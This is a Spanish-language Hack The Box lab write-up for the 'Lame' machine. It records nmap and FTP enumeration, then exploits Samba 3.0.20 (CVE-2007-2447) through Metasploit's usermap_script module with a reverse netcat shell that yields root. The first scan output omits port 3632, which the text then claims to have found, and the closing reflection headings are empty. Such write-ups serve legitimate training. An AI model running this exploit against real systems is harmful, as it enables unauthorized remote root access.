Lame

Hack The Box — Metodología Detallada

Lame

IP:10.129.18.177
OS:Linux
Dificultad:Easy
Fecha:2 de julio de 2026

Reconocimiento

Escaneo inicial

Se realizó un escaneo completo de puertos para identificar todos los servicios expuestos en la máquina y determinar los posibles vectores de ataque disponibles.

# Comando ejecutado
sudo nmap -p- -sS --open --min-rate 5000 -vvv -n -Pn "$target_ip" -oG allPorts

# Output
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack ttl 63
22/tcp   open  ssh          syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63

Se realizó el escaneo, identificándose los puertos abiertos: 21 (FTP), 22 (SSH), 139/445 (Samba) y 3632 (distccd). Se procedió a realizar un escaneo de versiones sobre dichos servicios para determinar el vector de ataque principal.

# Comando
sudo nmap -sVC -p22,21,139,445,3632 10.129.18.177

# Output
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   Domain name: hackthebox.gr
|_  FQDN: lame.hackthebox.gr

Observación: Se identificó que el servicio FTP permitía inicio de sesión anónimo, además de contar con la versión vsftpd 2.3.4, conocida por una puerta trasera histórica. Por otro lado, el servicio Samba reportó la versión 3.0.20, también vulnerable a múltiples CVEs conocidos. Se decidió priorizar la investigación sobre Samba antes de continuar con FTP.

Enumeración de FTP anónimo

Se inició sesión en el servicio FTP utilizando credenciales anónimas para descartar la presencia de archivos de valor.

ftp [email protected]
Connected to 10.129.18.177.
220 (vsFTPd 2.3.4)
331 Please specify the password.
Password:
230 Login successful.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

Resultado: El directorio se encontraba vacío, sin archivos de interés.

Enumeración de Vulnerabilidades

Investigación inicial — CVE-2007-0454

Hipótesis: Al confirmarse la versión de Samba 3.0.20, se investigó sobre vulnerabilidades asociadas, encontrándose el CVE-2007-0454, una vulnerabilidad de cadena de formato en el módulo VFS afsacl.so que permite ejecución de código arbitrario mediante especificadores de cadena de formato en nombres de archivo sobre un sistema de archivos AFS (Andrew File System).

CVE-2007-0454 relacionado con Samba 3.0.20

Descarte: Tras analizar las condiciones de explotación de esta CVE, se determinó que requiere específicamente que el sistema cuente con AFS configurado como sistema de archivos, condición poco común que no parecía estar presente en este entorno. Se descartó esta vía y se procedió a buscar exploits públicos disponibles para la misma versión de Samba desde una perspectiva más amplia.

Identificación del exploit correcto

Se utilizó searchsploit para verificar la existencia de módulos de explotación públicos para Samba 3.0.20, encontrándose una vulnerabilidad distinta y más conocida.

Samba 3.0.20 < 3.0.25rc3 - 'Username map script' Command Execution (Metasploit)
unix/remote/16320.rb

Observación: Este exploit corresponde al CVE-2007-2447, conocido como “username map script”, una vulnerabilidad de inyección de comandos en la configuración de Samba que no requiere AFS ni condiciones especiales adicionales, convirtiéndolo en el vector correcto para esta máquina.

Explotación

Configuración del exploit en Metasploit

msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS  10.129.18.177     yes       The target host(s)
RPORT   139               yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  10.10.15.163      yes       The listen address
LPORT  4444              yes       The listen port

Ejecución del exploit

msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.15.163:4444
[*] Command shell session 1 opened (10.10.15.163:4444 -> 10.129.18.177:40744)

whoami
root

Resultado: El exploit otorgó acceso directo como root, sin necesidad de una fase posterior de escalada de privilegios — la vulnerabilidad explotada ejecuta comandos directamente con privilegios máximos en el contexto del servicio Samba.

Reflexión Final

Qué salió bien

Qué salió mal o costó más

Lecciones aprendidas

Tiempo total

Tiempo total invertido en la resolución de la máquina: aproximadamente 40 minutos.